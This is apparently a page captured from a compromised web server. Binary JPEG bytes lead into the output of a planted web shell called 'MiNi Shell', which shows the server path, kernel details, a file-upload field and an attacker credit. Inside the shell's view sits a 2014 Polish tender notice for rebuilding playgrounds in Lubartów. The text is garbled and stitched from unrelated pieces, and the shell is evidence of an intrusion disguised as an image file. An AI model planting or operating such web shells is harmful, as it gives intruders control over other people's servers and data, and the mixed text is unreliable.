JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140123/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140123/15313-N-2014.html

<p class="kh_header"><b>Lubartów: Przebudowa placów zabaw (montaż urządzeń zabawowych, sportowo-rekreacyjnych i
komunalnych) na osiedlach Spółdzielni Mieszkaniowej w Lubartowie</b><br>
<b>Numer ogłoszenia: 15313 - 2014; data zamieszczenia: 23.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Spółdzielnia Mieszkaniowa w Lubartowie , ul. Cicha 6, 21-100 Lubartów, woj. lubelskie, tel. 081 463 90 01, faks 081 855 30 15.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółdzielnia Mieszkaniowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa placów zabaw (montaż urządzeń zabawowych, sportowo-rekreacyjnych i
komunalnych) na osiedlach Spółdzielni Mieszkaniowej w Lubartowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Przebudowa placów zabaw (montaż urządzeń zabawowych,  sportowo-rekreacyjnych i komunalnych) na osiedlach Spółdzielni Mieszkaniowej w Lubartowie. 
Przedmiot zamówienia wg Wspólnego Słownika Zamówień (CPV): 
Przedmiotem zamówienia jest Przebudowa placów zabaw (montaż urządzeń zabawowych,
sportowo-rekreacyjnych i komunalnych) na osiedlach Spółdzielni Mieszkaniowej w
Lubartowie.
Przedmiot zamówienia wg Wspólnego Słownika Zamówień (CPV):
37535200-9 - Wyposażenie placów zabaw
44400000-4 - Różne produkty gotowe i elementy z nimi związane
45000000-7 - Roboty budowlane
45112723-9 - Roboty w zakresie kształtowania placów zabaw
45212140-9 - Obiekty rekreacyjne
45236210-5 - Wyrównywanie nawierzchni placów zabaw dla dzieci
Przedmiot zamówienia obejmuje dwa zadania:
Zadanie I - Przebudowa placów zabaw (montaż urządzeń zabawowych i komunalnych). Do
przebudowy zaplanowano place zabaw pod adresami wymienionymi w Tabeli nr 1:
Ilości nowych urządzeń zabawowych i komunalnych, które mają być dostarczone i zamontowane w
zakresie Zadania I oraz ilości i lokalizacja istniejących urządzeń zabawowych do montażu
przedstawia tabela 2:
Tabela nr 1
Adres
1 E 1 Maja 61
2 D 1 Maja 69
3 B 1 Maja 79
4 A 1 Maja 87
5 G Powst. W-wy 71
6 F  Cicha 9
Numer
placu
zabaw
Szczegół na mapie sytuacyjnej
(załącznik Nr 7)
Zadanie II - Przebudowa placów zabaw (montaż urządzeń sportowo-rekreacyjnych i
komunalnych) - siłownie. Do przebudowy zaplanowano place zabaw pod adresami wymienionymi
w Tabeli nr 3:
Ilości nowych urządzeń zabawowych i komunalnych, które mają być dostarczone i zamontowane w
3
Tabela nr 3
Adres
7 C 1 Maja 81
8 F Cicha 13
9 H Powst. W-wy 77
Numer
placu
zabaw
Szczegół na mapie sytuacyjnej
Załącznik Nr 7
Ilości nowych urządzeń Tabela 2
L. p. RAZEM
1 Drążki do akrobacji 1 1
2 Huśtawka bocianie gniazdo 1 1 2
3 Huśtawka podwójna 1 2 1 1 1 6
4 Karuzela 1 1 2
5 Kółko i krzyżyk 1 1 2
6 Piaskownica sześciokątna 1 1 1 3
7 Równoważnia 1 1 2
8 Ścianka linowa pajęczyna 1 1 2
9 Ścianka wspinaczkowa 1 1
10 Urządzenie Mrowisko 1 1
11 Zestaw zręcznościowy Małpi gaj 1 1
12 Zestaw zabawowy 13-elem.
1 1
Zestaw zabawowy 19-elem.
1 1
13 Ławka parkowa 3 2 4 3 3 4 19
14 Kosz na śmieci 2 1 2 1 2 3 11
15 Ogrodzenie m 96,6 94,7 117,1 100,3 112,7 92,5 613,9
Ilości urządzeń istniejących do montażu
L. p. RAZEM
1 Zestaw zabawowy 4-elem
1 1 1 3
2 Sprężynowiec ścigacz 1 1 2 4
3 1 1
4 Karuzela 4 osobowa 1 1
5 Stół ping-pongowy 1 1 2
6 Huśtawka wahadłowa 1 1
7 Huśtawka wagowa 2 2
8 Regulamin placu zabaw 1 1 1 1 1 5
Typ urządzenia zabawowe go
i komunalnego
Plac zabaw
Nr 1
Plac zabaw
Nr 2
Plac zabaw
Nr 3
Plac z abaw
Nr 4
Plac zabaw
Nr 5
Plac zabaw
Nr 6
Typ urządzenia zabawowe go
i komunalnego
Plac zabaw
Nr 1
Plac zabaw
Nr 2
Plac zabaw
Nr 3
Plac z abaw
Nr 4
Plac zabaw
Nr 5
Plac zabaw
Nr 6
13 14 15 16 3 1 1
4 Karuzela 4 osobowa 1 1
5 1 1 2
6 Huśtawka wahadłowa 1 1
7 Huśtawka wagowa 2 2
8 Regulamin placu zabaw 1 1 1 1 1 5
Sprężynowiec ścigacz (zmiana
lokalizacji)
Stół ping-pongowy
zakresie Zadania II przedstawia tabela 4:
Zakres przedmiotu zamówienia
Czynności do wykonania przy przebudowie palców zabaw:
dla Zadania I (szczegółowy zakres zawarty jest w załączniku nr 8):
1. Dostawa i montaż nowych urządzeń zabawowych i komunalnych zgodnie z istniejącym opisem
technicznym.
2. Montaż urządzeń istniejących (w przypadku placu zabaw nr 5 - zmiana lokalizacji jednej z
zabawek na tym samym placu).
3. Ogrodzenie placów zabaw.
4. Uprzątnięcie terenu budowy i wyrównywanie nawierzchni placu.
dla Zadania II (szczegółowy zakres zawarty jest w załączniku nr 8):
1. Dostawa i montaż nowych urządzeń sportowo-rekreacyjnych i komunalnych zgodnie z
istniejącym opisem technicznym.
2. Uprzątnięcie terenu budowy i wyrównywanie nawierzchni placu.
Usytuowanie placów zabaw na osiedlach Spółdzielni Mieszkaniowej w Lubartowie przedstawione
zostało w załączniku nr 7 do SIWZ.
Wszystkie metalowe elementy urządzeń (ocynkowane metodą ogniową) będą pomalowane i
montowane na fundamentach, w postaci gotowych prefabrykatów betonowych. Urządzenia drewniane
będą odpowiednio zabezpieczone przed korozją i pomalowane. Pozostałe szczegóły dotyczące rodzaju
zabawek, montażu, rodzaju ogrodzenia, bram wejściowych, przęseł, konstrukcji itp. zawarte są w
załączniku nr 8 do SIWZ.
Urządzenia istniejące (poza sprężynowcem typ ścigacz na placu nr 5) będą zdeponowane w
magazynie Zamawiającego przy ul. Zielonej 1 w Lubartowie. Urządzenia istniejące zamontowane
zostały w 2010 r przez firmę INTERFLORA z Wrocławia. Montaż będzie polegał na transporcie
urządzeń z miejsca zdeponowania, wykonaniu fundamentów oraz zamocowaniu urządzeń do podłoża
4
Ilości urządzeń sportowo-rekreacyjnych Tabela 4
L. p. RAZEM
1 Biegacz 1 1
2 Biegacz  pylon  orbitrek 1 1 2
3 Drabinka pylon  podciąg nóg 1 1 2
4 Koła Tai Chi 1 1
5 Ławka  pylon  prostownik pleców 1 1 2
6 Orbitrek 1 1
7 Prasa nożna  pylon  wioślarz 1 1 2
8 Twister  wahadło 1 1 1 3
9 Wyciąg górny  pylon  wyciskanie siedząc 1 1 2
10 Ławka parkowa 2 5 2 9
11 Kosz na śmieci 1 4 5
12 Tablica informacyjna 1 1
13 Ogrodzenie [m] 101,1 101,1
Typ urządz enia sportoworekreacyjne
go- siłowni
Plac zabaw
Nr 7
Plac zabaw
Nr 8
Plac z abaw
Nr 9



zgodnie z opisem technicznym załącznik nr 8.
Ponadto Zamawiający informuje, że dwa urządzenia zabawowe zamontowane na placu zabaw nr 5
(sprężynowiec ścigacz i zestaw zabawowy 4-elementowy) pozostają na dotychczasowych miejscach.
Szczegółowe obowiązki Wykonawcy.
a) Prace należy wykonać zgodnie z opisem technicznym załączonym do SIWZ.
b) Wykonawca będzie zobowiązany w trakcie prac do dokonywania roboczych uzgodnień prac z
Zamawiającym .
c) Urządzenia wyposażenia placu zabaw powinny uwzględniać normy jakościowe w zakresie
doboru materiałów, wymaganych wymiarów i wymagań konstrukcyjno-jakościowych, a także
zawierać certyfikat zgodnie z normami PN-EN 1176, 1177 (nawierzchnie placów zabaw) oraz
1990-1999 (materiały do wyrobu zabawek).
d) Zastosowane materiały powinny być w I gatunku (najwyższej jakości). Wykonawca jest
zobowiązany w przypadku kiedy jest to wymagane przepisami prawa okazać i przekazać
Zamawiającemu dla materiałów atest higieniczny i kartę techniczną (kartą charakterystyki), a także
odpowiedni certyfikat wskazujący, że zapewniono zgodność z kryteriami technicznymi określonymi
na podstawie Polskich Norm, aprobat technicznych oraz właściwych przepisów i dokumentów
technicznych.
e) Wykonawca zobowiązany jest do udzielenia gwarancji jakości na wykonane roboty na okres nie
krótszy niż 60 miesięcy. W przypadku nie wypełniania przez Wykonawcę w formularzu
ofertowym pola określającego długość okresu gwarancji będzie to równoznaczne z
udzieleniem gwarancji na okres 60 m-cy. Oferta z niewypełnionym polem długości okresu
udzielanej gwarancji, o której mowa w zdaniu poprzednim będzie traktowana jako ważna nie
podlegająca odrzuceniu i zostanie poddana ocenie pod warunkiem, iż nie będzie innych
powodów skutkujących odrzuceniem takiej oferty lub wykluczeniem Wykonawcy.
5. Ogólne zasady postępowania
a) Wykonawca winien uwzględnić wszelkie ryzyko wynikające z zastosowanej technologii.
b) Proces technologiczny musi być bezpieczny i należy podjąć wszelkie środki dla uniknięcia
niebezpieczeństwa dla obsługi, urządzeń, otoczenia i środowiska oraz osób trzecich w czasie
uruchamiania, normalnego ruchu, planowanych remontów.
c) Wykonawca zobowiązuje się do zapewnienia proponowanego w ofercie udziału projektantów
oraz zapewnienia innych specjalistów niezbędnych do realizacji zamówienia.
d) Wykonawca jest odpowiedzialny za wszelkie koszty związane z wykonywaniem obowiązków
przez zatrudnione przez siebie osoby wykonujące zamówienie. Wykonawca dokonuje wyceny prac
na własne ryzyko i odpowiedzialność..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 44.40.00.00-4, 45.00.00.00-7, 45.11.27.23-9, 45.21.21.40-9, 45.23.62.10-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia przez Wykonawców wadium. Wykonawca przed upływem
terminu składania ofert zobowiązany jest wnieść wadium w wysokości 12 000,00 zł dla Zadania I,
i 6 000,00 zł dla Zadania II, odrębnie w odniesieniu do każdej z części zamówienia, na którą
składa ofertę.
2.Wadium wnoszone jest na cały okres związania ofertą i może być wnoszone w jednej lub kilku
następujących formach:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -
kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych
5) poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt 2 ustawy z
dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. z
2007 r. Nr. 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r.
Nr.96, poz. 620).
3.Wadium wniesione w pieniądzu wpłaca się na rachunek bankowy Zamawiającego przelewem. Nr
rachunku: PKO BP S.A. O Lubartów nr 57 1020 3206 0000 8402 0004 4255 z dopiskiem na
przelewie Wadium na przebudowę placów zabaw na osiedlach SM w Lubartowie 2014 O
jego wniesieniu w terminie decydować będzie data (w tym godzina) wpływu na podany wyżej
rachunek bankowy Zamawiającego.
Zamawiający wymaga, aby w przypadku wniesienia wadium w formie:
- pieniężnej dokument potwierdzający wpłatę wadium został dołączony do oferty,
- innej niż pieniądz, oryginał dokumentu został złożony w ofercie.
4. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej
lub zamknięcia postępowania bez dokonania wyboru oferty, z wyjątkiem Wykonawcy,
którego oferta została wybrana jako najkorzystniejsza.
5. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium
niezwłocznie po zawarciu umowy w sprawie zamówienia oraz wniesieniu zabezpieczenia
należytego wykonania umowy, jeżeli jego wniesienia żądano.
6. Zamawiający niezwłocznie zwraca wadium na wniosek Wykonawcy, który wycofał ofertę przed
upływem terminu składania ofert.
7. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je pomniejszone o koszty prowizji
bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę (Wykonawca
poda w ofercie numer konta na które należy zwrócić wadium wpłacone w formie pie-
8
niądza. W przypadku nie wskazania numeru konta Zamawiający zwróci je na rachunek
bankowy z którego wadium wpłynęło.)
8. Zamawiający zatrzymuje wadium, jeżeli Wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia na warunkach określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia stało się niemożliwe z przyczyn leżących po
stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy z wykorzystaniem wzoru zał. nr 1 do SIWZ.
2. Dokument potwierdzający wpłatę wadium.
3. Oświadczenie o akceptacji warunków przetargu zał. nr 2 do SIWZ.
5. Wykaz robót budowlanych zał. nr 4, potwierdzonych dołączonymi referencjami.
6. Oświadczenie o braku podstaw do wykluczenia z wykorzystaniem wzoru zał. nr 5
6
7. Opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest
ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z
przedmiotem zamówienia. W przypadku gdy polisa zawarta jest na okres krótszy niż czas realizacji
zamówienia, Wykonawca zobowiązany jest niezwłocznie dostarczyć polisę ubezpieczenia OC na
kolejne okresy obejmujące łącznie czas realizacji zamówienia.
8. Aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności
gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania
braku podstaw do wykluczenia z postępowania w postaci otwarcia wobec wykonawcy likwidacji
lub ogłoszenia upadłości, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ
zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia
wierzycieli przez likwidację majątku upadłego - wystawiony nie wcześniej niż 6 miesięcy przed
upływem terminu składania ofert.
9. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że
wykonawca nie zalega z opłaceniem podatków lub zaświadczenie, że uzyskał przewidziane prawem
zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości
wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem
terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia
albo składania ofert.
10. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy
Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem
składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane
prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie całości
wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem
terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia
albo składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Udzielona gwarancja na roboty - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.smlubartow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Spółdzielnia Mieszkaniowa w Lubartowie, ul. Cicha 6, 21-100 Lubartów, pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.02.2014 godzina 11:00, miejsce: Spółdzielnia Mieszkaniowa w Lubartowie, ul. Cicha 6, 21-100 Lubartów, pokój Sekretariatu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze Środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013
Poza innymi przypadkami wynikającymi z przepisów prawa i wzoru umowy Zamawiający
ze względu na fakt starania się o dofinansowanie realizacji przedmiotu zamówienia ze
środków Unii Europejskiej, zastrzega sobie prawo odstąpienia od umowy w przypadku
nieotrzymania takiego dofinansowania, przy czym z powodów powołanych w niniejszym
punkcie SIWZ Zamawiający może od umowy odstąpić nie później niż do dnia 30.04.2014 roku
(liczy się data nadania przez Zamawiającego stosownego pisma do Wykonawcy przesyłką
poleconą)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com